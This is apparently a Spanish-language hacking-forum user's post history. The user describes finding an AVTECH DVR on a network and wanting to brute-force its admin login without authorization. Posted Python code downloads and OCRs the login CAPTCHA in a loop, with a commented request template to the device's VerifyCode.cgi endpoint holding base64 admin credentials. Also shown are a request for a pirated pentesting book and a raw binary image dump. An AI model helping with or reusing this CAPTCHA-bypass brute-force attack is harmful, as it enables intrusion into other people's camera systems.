hola me podrian regalar por mp el libro de ox0000 python para pents.. por favor de ante mano muchas gracias
o si saben el link de desccarga porfa me lo pasan por mp please..
o si saben el link de desccarga porfa me lo pasan por mp please..
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#1
Dudas y pedidos generales / [SOLUCIONADO] me podrian regalar el pdf de oxw python para pentester
Marzo 30, 2018, 01:53:44 PM #2
Dudas y pedidos generales / Re:duda sobre python y def
Marzo 19, 2018, 08:35:45 PMNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta
import requests
from PIL import Image
from io import BytesIO
import os
import time
import pytesser
import cv2
import numpy as np
from re import sub
#5432
def cl():
url='No tienes permitido ver los links. Registrarse o Entrar a mi cuenta'
abrir= requests.get(url, timeout=None)
#obtenemos cookies
cok=abrir.cookies
#limpiamos la cookies.
#sacamos el captcha leectura.
ioo=BytesIO(abrir.content)
img=Image.open(ioo)
cv_img = np.asarray(img)[:,:,::].copy()
cc=cv2.cvtColor(cv_img, cv2.COLOR_BGR2GRAY)
blur = cv2.GaussianBlur(cc, (3, 3), 0)
threshold = cv2.threshold(blur, 128, 255, cv2.THRESH_BINARY)[1]
#kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (3, 3))
#morph = cv2.morphologyEx(threshold, cv2.MORPH_OPEN, kernel)
pi_ima=Image.fromarray(threshold)
#leemos la image
------------------------------------------------------------------------------------------------
cuando leeo la imagen es el problema la variable lee me imprime vaias veces el mismo nombree como mosre la salida arriba
-------------------------------------------------------------------------------------------------
lee=pytesser.image_to_string(pi_ima)
li=sub("\s","", lee)
pi_ima.save('C:\Users\Jose\Music\cap\{}.png'.format(li))
#os.rename("lee.png", '{}.png'.format(lee) )
print (li)
del (lee, li)
--------------------------------------------
#aqui colocamos un time
---------------------------------------------
time.sleep(0.5)
return
#creamos el diccionariopara el dvr
#creamos wl payload
#pyload='/cgi-bin/nobody/VerifyCode.cgi?account=YWRtaW46YWRtaW4=&captcha_code=%s&verify_code=%s', %()
-------------------------------------------------------------------------------------
necesito ejecutar para realizar un test de imagenes y saber donde falla para solucionarlo y optimizar mas la leectura de las imagenes
-----------------------------------------------------------------------------------------------
i=0
c=100
while i < c:
cl()
i+=1
print (i)
la solucion para no repetir la variable es el time.sleep() para que no arroje el mismo nombre anterior de la variable.
#3
Dudas y pedidos generales / Re:duda sobre python y def
Marzo 19, 2018, 07:04:58 PM
import requests
from PIL import Image
from io import BytesIO
import os
import time
import pytesser
import cv2
import numpy as np
from re import sub
#5432
def cl():
url='No tienes permitido ver los links. Registrarse o Entrar a mi cuenta'
abrir= requests.get(url, timeout=None)
#obtenemos cookies
cok=abrir.cookies
#limpiamos la cookies.
#sacamos el captcha leectura.
ioo=BytesIO(abrir.content)
img=Image.open(ioo)
cv_img = np.asarray(img)[:,:,::].copy()
cc=cv2.cvtColor(cv_img, cv2.COLOR_BGR2GRAY)
blur = cv2.GaussianBlur(cc, (3, 3), 0)
threshold = cv2.threshold(blur, 128, 255, cv2.THRESH_BINARY)[1]
#kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (3, 3))
#morph = cv2.morphologyEx(threshold, cv2.MORPH_OPEN, kernel)
pi_ima=Image.fromarray(threshold)
#leemos la image
------------------------------------------------------------------------------------------------
cuando leeo la imagen es el problema la variable lee me imprime vaias veces el mismo nombree como mosre la salida arriba
-------------------------------------------------------------------------------------------------
lee=pytesser.image_to_string(pi_ima)
li=sub("\s","", lee)
pi_ima.save('C:\Users\Jose\Music\cap\{}.png'.format(li))
#os.rename("lee.png", '{}.png'.format(lee) )
print (li)
del (lee, li)
return
#creamos el diccionariopara el dvr
#creamos wl payload
#pyload='/cgi-bin/nobody/VerifyCode.cgi?account=YWRtaW46YWRtaW4=&captcha_code=%s&verify_code=%s', %()
-------------------------------------------------------------------------------------
necesito ejecutar para realizar un test de imagenes y saber donde falla para solucionarlo y optimizar mas la leectura de las imagenes
-----------------------------------------------------------------------------------------------
i=0
c=100
while i < c:
cl()
i+=1
print (i)
from PIL import Image
from io import BytesIO
import os
import time
import pytesser
import cv2
import numpy as np
from re import sub
#5432
def cl():
url='No tienes permitido ver los links. Registrarse o Entrar a mi cuenta'
abrir= requests.get(url, timeout=None)
#obtenemos cookies
cok=abrir.cookies
#limpiamos la cookies.
#sacamos el captcha leectura.
ioo=BytesIO(abrir.content)
img=Image.open(ioo)
cv_img = np.asarray(img)[:,:,::].copy()
cc=cv2.cvtColor(cv_img, cv2.COLOR_BGR2GRAY)
blur = cv2.GaussianBlur(cc, (3, 3), 0)
threshold = cv2.threshold(blur, 128, 255, cv2.THRESH_BINARY)[1]
#kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (3, 3))
#morph = cv2.morphologyEx(threshold, cv2.MORPH_OPEN, kernel)
pi_ima=Image.fromarray(threshold)
#leemos la image
------------------------------------------------------------------------------------------------
cuando leeo la imagen es el problema la variable lee me imprime vaias veces el mismo nombree como mosre la salida arriba
-------------------------------------------------------------------------------------------------
lee=pytesser.image_to_string(pi_ima)
li=sub("\s","", lee)
pi_ima.save('C:\Users\Jose\Music\cap\{}.png'.format(li))
#os.rename("lee.png", '{}.png'.format(lee) )
print (li)
del (lee, li)
return
#creamos el diccionariopara el dvr
#creamos wl payload
#pyload='/cgi-bin/nobody/VerifyCode.cgi?account=YWRtaW46YWRtaW4=&captcha_code=%s&verify_code=%s', %()
-------------------------------------------------------------------------------------
necesito ejecutar para realizar un test de imagenes y saber donde falla para solucionarlo y optimizar mas la leectura de las imagenes
-----------------------------------------------------------------------------------------------
i=0
c=100
while i < c:
cl()
i+=1
print (i)
#4
Dudas y pedidos generales / [SOLUCIONADO] Duda sobre python y def
Marzo 19, 2018, 06:43:55 PM
amigo me pueden ayudar con lo siguiente:
estoy realizando un script de fuerza bruta en python pero cuando utilizo un wile con un def me arroja en resultado repetido
FV41
1
JwUw
2
JwUw
3
JwUw
4
HRNG
5
yeow
6
yeow
7
QWIU
8
QWIU
9
QWIU
10
QWIU
11
ese ees el resultado repetido 3 o 4 o 5 veces luego cambia como hago para limpiar la variable para que salga consecutivamente? gracias de ante mano
estoy realizando un script de fuerza bruta en python pero cuando utilizo un wile con un def me arroja en resultado repetido
FV41
1
JwUw
2
JwUw
3
JwUw
4
HRNG
5
yeow
6
yeow
7
QWIU
8
QWIU
9
QWIU
10
QWIU
11
ese ees el resultado repetido 3 o 4 o 5 veces luego cambia como hago para limpiar la variable para que salga consecutivamente? gracias de ante mano
#5
Dudas y pedidos generales / Re:ayuda con python y un captcha cgi-bin
Marzo 07, 2018, 09:27:04 PM
ya resolvi el servidor envia una imagen .bmp y mi libreria pil la actualic como pillow y ya esta guardando y abriendo la img sin problemas ...
#6
Dudas y pedidos generales / [SOLUCIONADO] Ayuda con python y un captcha cgi-bin
Marzo 07, 2018, 08:34:33 PM
hola amigos hoy tengo la posibilidad de preguntar lo siguiente.
eh encontrado un dvr avtch en una red y quiero entrar a el por la http: no tengo pass pero el user es admin.
lo que pasa es que quiero hacer fuerza bruta pero tiene un captcha, no tiene limites de intento y estoy ralizando un script en python
con libreria request pil y pytesserect pero eque es lo que pasa el captcha es cgi-bin
este es el get de la pagina /cgi-bin/nobody/VerifyCode.cgi?account=YWRtaW46YWRtaW4=&captcha_code=86LC&verify_code=1520349816l-1l HTTP/1.1
explico rapidamente.. el mismo necesita de las cookies el usuer y la pass esta codificado base64 y la imagen se inserta automaticamente con una funcion de jquery
esta es la info del html en la imagen
<img src="/cgi-bin/nobody/Captcha.cgi?action=get&image=login_bmp" id="Captcha" alt="" class="codeBorder" width="132" height="29" border="1">
el src sale de el jquery.
function getCaptchaImg(){
document.getElementById("Captcha").src = "/cgi-bin/nobody/Captcha.cgi?action=get&image=login_bmp";
}
ok cuando realizo una peticion con requests en python el src donde se encuentra la imagen esta vacia NO tiene nada entonces
lo que realice fue hacer un requests directo al captcha el link de la imagen pero al momento de devolver el valor la imagen viene en blanco.
en blanco es en blanco y la salida que obtengo es esta es como si la imagen vine encriptada no se y no puedo capturarlo
pero en otros captcha si puedo esta es lasalida de la imagen en txt
Código: text
si me pueden ayudar a capturar la imagen por favor por que es como si estuviera escondida y no la atrapa.
eh encontrado un dvr avtch en una red y quiero entrar a el por la http: no tengo pass pero el user es admin.
lo que pasa es que quiero hacer fuerza bruta pero tiene un captcha, no tiene limites de intento y estoy ralizando un script en python
con libreria request pil y pytesserect pero eque es lo que pasa el captcha es cgi-bin
este es el get de la pagina /cgi-bin/nobody/VerifyCode.cgi?account=YWRtaW46YWRtaW4=&captcha_code=86LC&verify_code=1520349816l-1l HTTP/1.1
explico rapidamente.. el mismo necesita de las cookies el usuer y la pass esta codificado base64 y la imagen se inserta automaticamente con una funcion de jquery
esta es la info del html en la imagen
<img src="/cgi-bin/nobody/Captcha.cgi?action=get&image=login_bmp" id="Captcha" alt="" class="codeBorder" width="132" height="29" border="1">
el src sale de el jquery.
function getCaptchaImg(){
document.getElementById("Captcha").src = "/cgi-bin/nobody/Captcha.cgi?action=get&image=login_bmp";
}
ok cuando realizo una peticion con requests en python el src donde se encuentra la imagen esta vacia NO tiene nada entonces
lo que realice fue hacer un requests directo al captcha el link de la imagen pero al momento de devolver el valor la imagen viene en blanco.
en blanco es en blanco y la salida que obtengo es esta es como si la imagen vine encriptada no se y no puedo capturarlo
pero en otros captcha si puedo esta es lasalida de la imagen en txt
BM- 6 ( ,,
Ü, Ä Ä ( ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿ ÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ€ € € € € € € € € ÿÿÿÿÿÿÿÿÿÿÿÿ€ € € € € € ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿ ÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿ€ € € € € € € € € ÿÿÿÿÿÿÿÿÿÿÿÿ€ € € € € € ÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿ ÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿFisFisFisFisFisFisFisFisFisFisFisFisFisFis€ € € FisFisFisÿÿÿ ÿ ÿÿÿÿÿÿ€ € € € ÿÿÿÿ ÿÿÿÿÿÿÿ ÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿ ÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿ ÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿ€ € € ÿÿÿÿÿÿÿÿÿFisFisFis€ € € € FisFisFisFisFisFisFisFisFisFisFisFisFisÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿ ÿÿ ÿÿÿÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿ ÿÿ ÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿ€ € € ÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿ€ € € € € ÿÿÿÿÿÿ ÿ ÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿFisFisFisFisFisFis ÿ ÿ ÿ ÿ Fis ÿ ÿ ÿ ÿ FisFisFisFisFisÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿ ÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿ€ € € € € € € € € € € € ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿFisFisFisFisFisFisFisFisFisFisFisFisFisFis ÿ ÿ ÿFisFisFisÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ€ € € € € € € € € € ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿFisFisFis ÿ ÿ ÿ ÿFisFisFisFisFisFisFisFisFisFisFisFisFisÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿ ÿÿÿÿ€ € € € € € € € € € € € € ÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿFisFisFisFisFisFisFisFisFis ÿ ÿ ÿ ÿ FisFisFisFisFisFisFisÿÿÿÿ ÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ€ € € ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ€ € € € ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿ ÿ ÿÿ ÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿFisFisFisFisFisFisFisFisFisFisFisFisÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ€ € € ÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿ€ € € € ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿÿÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿFisFisFisFisFisFisFisFisFisFisFisFisFisFis€ € € FisFisFisÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ€ € € ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿÿÿ ÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿ€ € € ÿÿÿÿÿÿÿÿÿFisFisFisFis€ € € € FisFisFisFisFisFisFisFisFisFisFisFisÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿ ÿ ÿ ÿ ÿ 